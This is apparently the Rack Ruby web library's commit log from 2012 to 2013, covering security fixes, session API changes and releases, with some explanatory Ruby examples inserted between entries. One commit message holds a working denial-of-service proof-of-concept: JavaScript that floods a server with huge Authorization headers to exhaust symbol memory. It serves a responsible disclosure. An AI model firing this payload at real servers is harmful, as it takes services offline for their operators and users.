Santiago Pastorino [Mon, 15 Jul 2013 03:09:27 +0000 (20:09 -0700)]
Merge pull request #585 from MSch/patch-1
Fix bug in sendfile.rb
James Tucker [Fri, 8 Feb 2013 03:01:22 +0000 (19:01 -0800)]
Bump version number
James Tucker [Fri, 8 Feb 2013 02:57:06 +0000 (18:57 -0800)]
Add release notes for today's releases
James Tucker [Thu, 7 Feb 2013 00:25:22 +0000 (16:25 -0800)]
Prevent symlink path traversals
* Closes CVE-2013-0262
Tim Moore [Wed, 30 Jan 2013 02:45:32 +0000 (13:45 +1100)]
Stop overwriting existing pidfiles.
A race condition can arise when two servers are started simultaneously. Both
instances may complete the check for an existing pidfile before either one
writes it.
Now the pidfile is opened with ::File::EXCL, which raises an error if the file
already exists. This error is handled by retrying the check and the write.
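The exclusive-create pattern this commit describes, as an added example (not Rack's own code): the pidfile is opened with File::EXCL so the kernel, not a prior existence check, decides who wins, and a losing opener only reclaims a file whose recorded pid is dead.

```ruby
# Added example, not Rack's own code. Creates a pidfile without the
# check-then-write race: File::EXCL makes the open fail with EEXIST when
# the file already exists, so two servers racing to start cannot both
# believe they created it.
require 'tmpdir'

class PidfileError < StandardError; end

# :running if the pid recorded in the file still answers Process.kill(0),
# :stale if the process is gone or the file is missing or unparsable.
def pidfile_state(path)
  pid = File.read(path).to_i
  return :stale if pid <= 0
  Process.kill(0, pid)
  :running
rescue Errno::ESRCH, Errno::ENOENT
  :stale
rescue Errno::EPERM
  :running # process exists but belongs to another user
end

# Writes +pid+ to +path+ and returns it. Raises PidfileError while a live
# process owns the file. A stale file is removed and the open retried,
# which is the "retry the check and the write" loop the commit describes.
def write_pidfile(path, pid = Process.pid, attempts = 3)
  attempts.times do
    begin
      File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0644) do |f|
        f.write(pid.to_s)
      end
      return pid
    rescue Errno::EEXIST
      # Lost the race, or a previous run left the file behind. Only a
      # file whose pid is no longer alive may be reclaimed.
      raise PidfileError, "#{path}: server already running" if pidfile_state(path) == :running
      begin
        File.delete(path)
      rescue Errno::ENOENT
        # another racer already removed the stale file; just retry
      end
    end
  end
  raise PidfileError, "could not claim #{path} after #{attempts} attempts"
end
```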
James Tucker [Thu, 7 Feb 2013 22:47:10 +0000 (14:47 -0800)]
Use secure_compare for hmac comparison
* Closes CVE-2013-0263
James Tucker [Wed, 6 Feb 2013 23:31:53 +0000 (15:31 -0800)]
Add secure_compare to Rack::Utils
Conflicts:
test/spec_utils.rb
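The two commits above replace a plain `==` on HMAC digests with a constant-time comparison. As an added example (not Rack's own code), here is that comparison alongside a signed-cookie check in the `data--hmac` layout Rack's cookie session uses; the secret and cookie values are constructed for the example.

```ruby
# Added example, not Rack's own code. Shows the comparison that
# CVE-2013-0263 introduced and the naive form it replaced.
require 'openssl'

SECRET = 'constructed-example-secret' # constructed; load from config in real code

# Constant-time equality: unequal lengths reject at once (the length of an
# HMAC is not secret), otherwise every byte is XORed and the results ORed,
# so the running time does not reveal where the first mismatch sits.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  left = a.unpack('C*')
  acc = 0
  b.each_byte { |byte| acc |= byte ^ left.shift }
  acc == 0
end

def sign(data, secret = SECRET)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
end

# Cookie value laid out as "<payload>--<hexdigest>".
def valid_signed_value?(cookie, secret = SECRET)
  data, digest = cookie.split('--', 2)
  return false if data.nil? || digest.nil?
  secure_compare(digest, sign(data, secret))
end

# The pre-fix form, kept for contrast: String#== returns at the first
# differing byte, which is the timing side channel the fix closes.
def valid_signed_value_naive?(cookie, secret = SECRET)
  data, digest = cookie.split('--', 2)
  return false if data.nil? || digest.nil?
  digest == sign(data, secret)
end
```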
James Tucker [Thu, 7 Feb 2013 02:01:06 +0000 (18:01 -0800)]
Ensure binary modes are used in tests, for Windows
James Tucker [Thu, 7 Feb 2013 01:40:34 +0000 (17:40 -0800)]
Fix a bug where host matching occurs out of order
* Closes #504
James Tucker [Wed, 6 Feb 2013 22:13:10 +0000 (14:13 -0800)]
Add JSON cookie coder. To be default after 1.6+
Jordi Massaguer Pla [Wed, 6 Feb 2013 12:41:16 +0000 (13:41 +0100)]
add license information to gemspec
this way it can be used with rubygems.org API
Oscar Del Ben [Sun, 3 Feb 2013 05:28:50 +0000 (21:28 -0800)]
Fix reference link
Oscar Del Ben [Sun, 3 Feb 2013 03:50:01 +0000 (19:50 -0800)]
Document Rack::Deflater
James Tucker [Sat, 2 Feb 2013 16:06:26 +0000 (08:06 -0800)]
Request#trusted_proxy? no longer accepts lines
* Closes #508
* Adds some limited coverage. More issues highlighted - incomplete local ips.
Santiago Pastorino [Tue, 29 Jan 2013 14:01:44 +0000 (12:01 -0200)]
Add find and set methods to Session object
James Tucker [Mon, 28 Jan 2013 22:49:43 +0000 (14:49 -0800)]
Fix ChangeLog generation on 1.9.3+
James Tucker [Mon, 28 Jan 2013 22:42:41 +0000 (14:42 -0800)]
Bump version and add release notes to README
James Tucker [Mon, 28 Jan 2013 21:44:57 +0000 (13:44 -0800)]
Merge pull request #500 from aocole/patch-1
Changing incorrect documentation
James Tucker [Mon, 28 Jan 2013 21:37:11 +0000 (13:37 -0800)]
Remove specific version code from Lint
* Too easy to miss during updates
* Required format unchanged
* Closes #501
James Tucker [Mon, 28 Jan 2013 21:30:52 +0000 (13:30 -0800)]
Reimplement keys and values on SessionHash
* Basic additional APIs to simplify requirements for Rails and Devise
Andrew Cole [Fri, 25 Jan 2013 05:02:23 +0000 (21:02 -0800)]
Changing incorrect documentation
The original comment on set_session said to return true or false
depending on whether the session was saved or not. In reality, this
method MUST return the session id in order for #commit_session to set
the cookie data properly.
James Tucker [Tue, 22 Jan 2013 16:04:18 +0000 (08:04 -0800)]
Merge branch 'lint-headerhash' of git://bogomips.org/rack
* 'lint-headerhash' of git://bogomips.org/rack:
lint: avoid TypeError on non-Hash-like response headers
Konstantin Haase [Tue, 22 Jan 2013 14:23:11 +0000 (06:23 -0800)]
Merge pull request #499 from barttenbrinke/master
Added specific test when X-Forwarded-For is 'unknown'
Bart ten Brinke [Tue, 22 Jan 2013 14:14:42 +0000 (15:14 +0100)]
Added spec for new Squid behaviour.
Also see http://www.squid-cache.org/Doc/config/forwarded_for/
Eric Wong [Tue, 22 Jan 2013 11:29:59 +0000 (11:29 +0000)]
lint: avoid TypeError on non-Hash-like response headers
According to SPEC (and check_headers), Response headers need only
respond to #each. Thus, check_hijack_response should rely on
Rack::Utils::HeaderHash if it wishes to access the headers in a
hash-like fashion.
James Tucker [Tue, 22 Jan 2013 07:36:04 +0000 (23:36 -0800)]
Update gemspec version, Rack 1.5.0
James Tucker [Tue, 22 Jan 2013 07:35:34 +0000 (23:35 -0800)]
Update README for 1.5.0 release
James Tucker [Tue, 22 Jan 2013 04:12:57 +0000 (20:12 -0800)]
Switch to RFC 2822 expires
James Tucker [Mon, 21 Jan 2013 22:01:58 +0000 (14:01 -0800)]
Fix a long standing misnomer for date formats
References #414
James Tucker [Mon, 21 Jan 2013 21:30:16 +0000 (13:30 -0800)]
Use Dir.tmpdir instead of hardcoded /tmp
Closes #492
James Tucker [Mon, 21 Jan 2013 21:24:24 +0000 (13:24 -0800)]
Don't modify the middleware hash in Rack::Server
* Closes #498
James Tucker [Mon, 21 Jan 2013 21:17:23 +0000 (13:17 -0800)]
Merge pull request #496 from homakov/patch-3
Remove never called string
Egor Homakov [Mon, 14 Jan 2013 15:48:10 +0000 (22:48 +0700)]
Remove never called string
Previous check `p.empty?` makes sure that p contains at least 1 symbol.
After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
James Tucker [Sun, 13 Jan 2013 22:10:08 +0000 (14:10 -0800)]
Update to 1.5.0.beta.2
James Tucker [Sun, 13 Jan 2013 22:09:25 +0000 (14:09 -0800)]
Update README security notes
James Tucker [Sun, 13 Jan 2013 21:55:50 +0000 (13:55 -0800)]
Update README for release. Add security section.
James Tucker [Sun, 13 Jan 2013 21:46:27 +0000 (13:46 -0800)]
Rack::Auth::AbstractRequest#scheme returns strings
* This is a breaking API change, but doesn't appear to be used in public
James Tucker [Sun, 13 Jan 2013 21:37:30 +0000 (13:37 -0800)]
Squash test warnings
James Tucker [Sun, 13 Jan 2013 21:33:30 +0000 (13:33 -0800)]
Turn warnings back on for basic test runs
James Tucker [Sun, 13 Jan 2013 21:33:08 +0000 (13:33 -0800)]
Squash warnings in spec_auth
James Tucker [Sun, 13 Jan 2013 21:10:20 +0000 (13:10 -0800)]
Reimplement auth scheme fix
* Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
* Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
* Checked Rails - they don't use our authorization code
* Checked Warden - uses rails
* Checked Omniauth - uses rails
* Checked doorkeeper - uses rails
* Checked rack-authentication - does its own thing
* Checked warden-oauth - doesn't do headers
* Checked devise - uses rails
* Checked oauth2-rack - header creation only
* Checked rack-oauth2-server - does its own thing
* Probably missed a bunch, but that'll have to do
James Tucker [Sun, 13 Jan 2013 20:31:12 +0000 (12:31 -0800)]
Revert "Merge pull request #494 from homakov/patch-2"
This reverts commit 9b76e4fb58b5870ff48ba9704432787bc2e76cfb, reversing changes made to bf32f4bbfc5401dde48341cd5e664e2f7837d151.
Konstantin Haase [Sun, 13 Jan 2013 15:29:24 +0000 (07:29 -0800)]
Merge pull request #494 from homakov/patch-2
Remove .to_sym in Authorization scheme
Egor Homakov [Sun, 13 Jan 2013 15:15:25 +0000 (22:15 +0700)]
Remove .to_sym in Authorization scheme
Hello, `.to_sym` should never be applied to user input. Thus I recommend you change the `scheme` method:
```ruby
def scheme
@scheme ||= parts.first.downcase.to_sym
end
```
While we can't send an enormous amount of `Authorization` headers, we can make it as long as possible.
This is a PoC. App (`config.ru`):
```ruby
require 'rack'
run lambda{|e|
auth = Rack::Auth::Basic::Request.new(e)
puts auth.basic? if auth.provided?
puts Symbol.all_symbols.size
[200, {'Content-Type'=>'text/html'},['IM FINE']]
}
```
Simple Javascript to DoS it:
```javascript
var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
var total_sent = 0
for(var num in base){
var x = new XMLHttpRequest;
x.open('GET','/');
str = '';
for(i=0;i<2000000;i++){
str+='Ё'+base[num]+i;
}
x.setRequestHeader('Authorization',str+' lol')
x.send();
console.log('Total sent: ',total_sent+=str.length);
}
```
When we run the JS, every request carries 18888890 letters in a symbol. This 'data' will never be garbage collected.
Should it be fixed?
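The direction the follow-up commits took ("AbstractRequest#scheme returns strings" and a registry via Rack::Auth.add_scheme), as an added example that is not Rack's code: the scheme is kept as a downcased String so header values never reach the symbol table, and only registered names are recognised. The env keys, the AuthRequest class and the initial scheme list are assumptions of this example.

```ruby
# Added example, not Rack's own code. Parses the Authorization scheme
# without interning attacker-controlled input.
require 'set'

# Constructed starting registry; real deployments add what they use.
AUTH_SCHEMES = Set.new(%w[basic digest bearer token oauth oauth2])

# Registers another scheme name (same idea as Rack::Auth.add_scheme).
def add_scheme(name)
  AUTH_SCHEMES << name.to_s.downcase
end

class AuthRequest
  # CGI-style env keys assumed here for the Authorization header.
  AUTHORIZATION_KEYS = %w[HTTP_AUTHORIZATION X-HTTP_AUTHORIZATION X_HTTP_AUTHORIZATION]

  def initialize(env)
    @env = env
  end

  def provided?
    !authorization_key.nil?
  end

  # A String, never a Symbol: arbitrary header values cost nothing beyond
  # the request and are garbage collected with it.
  def scheme
    @scheme ||= parts.first.to_s.downcase
  end

  # Membership test against the registry instead of trusting the raw value.
  def known_scheme?
    AUTH_SCHEMES.include?(scheme)
  end

  # Credentials part of the header, or nil when absent.
  def params
    parts[1]
  end

  private

  def authorization_key
    AUTHORIZATION_KEYS.find { |key| @env.key?(key) }
  end

  def parts
    @parts ||= @env[authorization_key].to_s.split(' ', 2)
  end
end
```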
James Tucker [Fri, 11 Jan 2013 22:57:12 +0000 (14:57 -0800)]
Merge branch 'hijack'
* hijack:
Hijack SPEC changes after review discussion
Add straw man for the after-headers hijack
Straw man for rack.hijack*, connection hijacking!
James Tucker [Fri, 11 Jan 2013 22:56:52 +0000 (14:56 -0800)]
Hijack SPEC changes after review discussion
James Tucker [Fri, 11 Jan 2013 22:26:04 +0000 (14:26 -0800)]
Add q-value helpers for Accept headers, etc.
* Supersedes and closes #443
James Tucker [Fri, 11 Jan 2013 18:39:17 +0000 (10:39 -0800)]
Introduce Rack::Mime.match?, references #443
James Tucker [Fri, 11 Jan 2013 18:22:02 +0000 (10:22 -0800)]
Minor code review comments closing #451
* Adds documentation
* find is preferred over detect
* Superseded body objects should be closed
James Tucker [Fri, 11 Jan 2013 18:14:40 +0000 (10:14 -0800)]
Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"
This reverts commit 3b24fa958ba43baad66c7e866990e052497c89f8.
James Tucker [Fri, 11 Jan 2013 18:13:58 +0000 (10:13 -0800)]
Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/rack into sendfile
* 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
Set TMPDIR to fix Dir.mktmpdir under jRuby
Additional Ruby 1.8 compatibility
Make spec_sendfile work with Ruby < 1.9
Initialize Rack::Sendfile with accel mappings
James Tucker [Fri, 11 Jan 2013 18:08:07 +0000 (10:08 -0800)]
Enable unix sockets with paths as trusted proxies
* Supersedes and closes #488
James Tucker [Fri, 11 Jan 2013 17:02:17 +0000 (09:02 -0800)]
Merge pull request #491 from spastorino/allow_build_different_session_object
Allow subclasses to build a different Session Object
Santiago Pastorino [Fri, 11 Jan 2013 03:57:54 +0000 (01:57 -0200)]
Allow subclasses to build a different Session Object
James Tucker [Fri, 11 Jan 2013 02:51:51 +0000 (18:51 -0800)]
Merge pull request #490 from slivu/master
Added Reel Web Server and Espresso Framework to supported software list
James Tucker [Fri, 11 Jan 2013 02:51:35 +0000 (18:51 -0800)]
Merge pull request #489 from spastorino/abstract_id_tiny_patches
Abstract id tiny patches
slivu [Thu, 10 Jan 2013 14:19:58 +0000 (16:19 +0200)]
Update README.rdoc
Santiago Pastorino [Thu, 10 Jan 2013 14:03:34 +0000 (12:03 -0200)]
Fix current_session_id docs; the id is retrieved from SessionHash now
Santiago Pastorino [Thu, 10 Jan 2013 02:53:40 +0000 (00:53 -0200)]
Implement the ID API correctly
Santiago Pastorino [Thu, 10 Jan 2013 02:44:02 +0000 (00:44 -0200)]
Session is already loaded at this point
Santiago Pastorino [Wed, 9 Jan 2013 02:59:10 +0000 (00:59 -0200)]
Rename by to store to better match the purpose of that object
James Tucker [Mon, 7 Jan 2013 22:01:01 +0000 (14:01 -0800)]
Merge pull request #487 from carlosantoniodasilva/remove-warnings
Remove warnings: 'not used variable' and 'shadowing outer variable'
Carlos Antonio da Silva [Mon, 7 Jan 2013 21:12:42 +0000 (19:12 -0200)]
Remove warnings: 'not used variable' and 'shadowing outer variable'
James Tucker [Mon, 7 Jan 2013 18:46:43 +0000 (10:46 -0800)]
Add release announcements to README
Eric Wong [Wed, 22 Aug 2012 22:48:23 +0000 (22:48 +0000)]
multipart/parser: avoid unbounded #gets method
Malicious clients may send excessively long lines
to trigger out-of-memory errors in a Rack web server.
James Tucker [Mon, 7 Jan 2013 03:35:31 +0000 (19:35 -0800)]
Merge pull request #484 from oscardelben/update_examples
Update Lobster example
Oscar Del Ben [Mon, 7 Jan 2013 03:20:29 +0000 (19:20 -0800)]
Update Lobster example
James Tucker [Mon, 7 Jan 2013 03:02:14 +0000 (19:02 -0800)]
Merge pull request #483 from oscardelben/update_readme
Remove reference to dead link
Oscar Del Ben [Mon, 7 Jan 2013 02:53:52 +0000 (18:53 -0800)]
Remove reference to dead link
James Tucker [Sun, 6 Jan 2013 23:49:41 +0000 (15:49 -0800)]
Update release date from rack-1.3 branch
James Tucker [Sun, 6 Jan 2013 23:41:50 +0000 (15:41 -0800)]
Add missing release section from 1.1 branch
James Tucker [Sun, 6 Jan 2013 23:03:47 +0000 (15:03 -0800)]
Add today's releases to the README
James Tucker [Sun, 6 Jan 2013 22:20:36 +0000 (14:20 -0800)]
Merge pull request #482 from oscardelben/fix_webrick_port
Add default port to webrick
Oscar Del Ben [Sat, 5 Jan 2013 22:53:19 +0000 (14:53 -0800)]
Add default port to webrick
James Tucker [Sat, 5 Jan 2013 02:28:15 +0000 (21:28 -0500)]
Add straw man for the after-headers hijack
James Tucker [Fri, 4 Jan 2013 23:33:07 +0000 (18:33 -0500)]
Straw man for rack.hijack*, connection hijacking!
James Tucker [Fri, 4 Jan 2013 17:17:36 +0000 (09:17 -0800)]
Merge pull request #480 from udzura/master
Add a rackup option for a one-liner rack app server
James Tucker [Fri, 4 Jan 2013 16:46:46 +0000 (11:46 -0500)]
master is now Rack 1.5, SPEC 1.2.
James Tucker [Sun, 13 May 2012 22:02:17 +0000 (15:02 -0700)]
Fix parsing performance for unquoted filenames
Special thanks to Paul Rogers & Eric Wong
Conflicts:
test/spec_multipart.rb
Uchio KONDO [Thu, 3 Jan 2013 03:00:27 +0000 (12:00 +0900)]
Add a rackup option for one-liner rack app server
Uchio KONDO [Thu, 3 Jan 2013 02:45:47 +0000 (11:45 +0900)]
Extract Builder.new_from_string from Builder.parse_file
James Tucker [Sun, 30 Dec 2012 05:31:14 +0000 (00:31 -0500)]
Cleanup Lint Content-Type section after 3623d04
James Tucker [Sun, 30 Dec 2012 05:17:56 +0000 (00:17 -0500)]
Revert "Merge pull request #259 from bartuer/master"
This reverts commit ec5634c6151412a722df7c3305fd3b6291a66ec5, reversing changes made to c23edf4f7d43ed9fba3fde1cbcf7ebf286730829.
James Tucker [Sun, 30 Dec 2012 05:15:12 +0000 (21:15 -0800)]
Merge pull request #259 from bartuer/master
add content type check to deflater
James Tucker [Sun, 30 Dec 2012 04:36:57 +0000 (20:36 -0800)]
Merge pull request #367 from rack/mime_type
Mime type corrections
James Tucker [Sat, 17 Mar 2012 19:50:59 +0000 (12:50 -0700)]
Correct some of the mime type issues. References #316 and #366.
HTTP 1.0 and 1.1 do not have MUST for Content-Type requirements; they have "should" (not SHOULD). They also have text describing how clients should handle this header being missing.
Sokolov Yura [Fri, 9 Nov 2012 09:58:56 +0000 (13:58 +0400)]
Fix parsing multiple ranges
Fix parsing of multiple ranges in the HTTP_RANGE header according to RFC 2616 (see the last example in sec 14.35.1, http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35.1, and the BNF rules in http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.1 ).
James Tucker [Sat, 29 Dec 2012 20:47:59 +0000 (15:47 -0500)]
.woff now has an official mime type!
* Closes #405
James Tucker [Sat, 29 Dec 2012 20:44:56 +0000 (12:44 -0800)]
Merge pull request #458 from hexfet/master
Allow EOFError exception to be passed through
James Tucker [Sat, 29 Dec 2012 20:28:25 +0000 (15:28 -0500)]
Do not fail on cookies that are not URI escaped
* Closes #360
James Tucker [Sat, 29 Dec 2012 18:04:46 +0000 (13:04 -0500)]
Add a note in KNOWN-ISSUES regarding ECMA escape
James Tucker [Sat, 29 Dec 2012 19:59:43 +0000 (11:59 -0800)]
Merge pull request #476 from spastorino/fix_2_0_build
Fix Ruby 2.0 build
Santiago Pastorino [Sat, 29 Dec 2012 19:36:08 +0000 (17:36 -0200)]
Fix Ruby 2.0 build
Konstantin Haase [Sat, 29 Dec 2012 19:05:04 +0000 (20:05 +0100)]
add ruby 2.0 to travis matrix
Konstantin Haase [Sat, 29 Dec 2012 18:51:55 +0000 (10:51 -0800)]
Merge pull request #475 from spastorino/remove_2_0_warns
Use to_enum instead of Enumerator.new to remove Ruby 2.0 warnings
Santiago Pastorino [Sat, 29 Dec 2012 18:49:27 +0000 (16:49 -0200)]
Use to_enum instead of Enumerator.new to remove Ruby 2.0 warnings
This commit avoids the warning message:
Enumerator.new without a block is deprecated; use Object#to_enum
James Tucker [Sat, 29 Dec 2012 16:37:22 +0000 (08:37 -0800)]
Merge pull request #474 from yeban/handlers_puma
Add puma as a potential default alongside thin (replace #455).
Anurag Priyam [Fri, 28 Dec 2012 22:50:55 +0000 (22:50 +0000)]
Add puma as a potential default alongside thin (close #455).
Signed-off-by: Anurag Priyam <anurag08priyam@gmail.com>
Anurag Priyam [Fri, 28 Dec 2012 22:46:41 +0000 (22:46 +0000)]
Introduce Rack::Handler.pick ...
... to select first available Rack handler given a list of server names.
This functionality is ripped off Sinatra::Base.detect_rack_handler with very
minor semantic and cosmetic changes.
Signed-off-by: Anurag Priyam <anurag08priyam@gmail.com>
James Tucker [Sat, 29 Dec 2012 01:03:18 +0000 (17:03 -0800)]
Merge pull request #453 from unbit/master
add uWSGI to the list of servers supporting Rack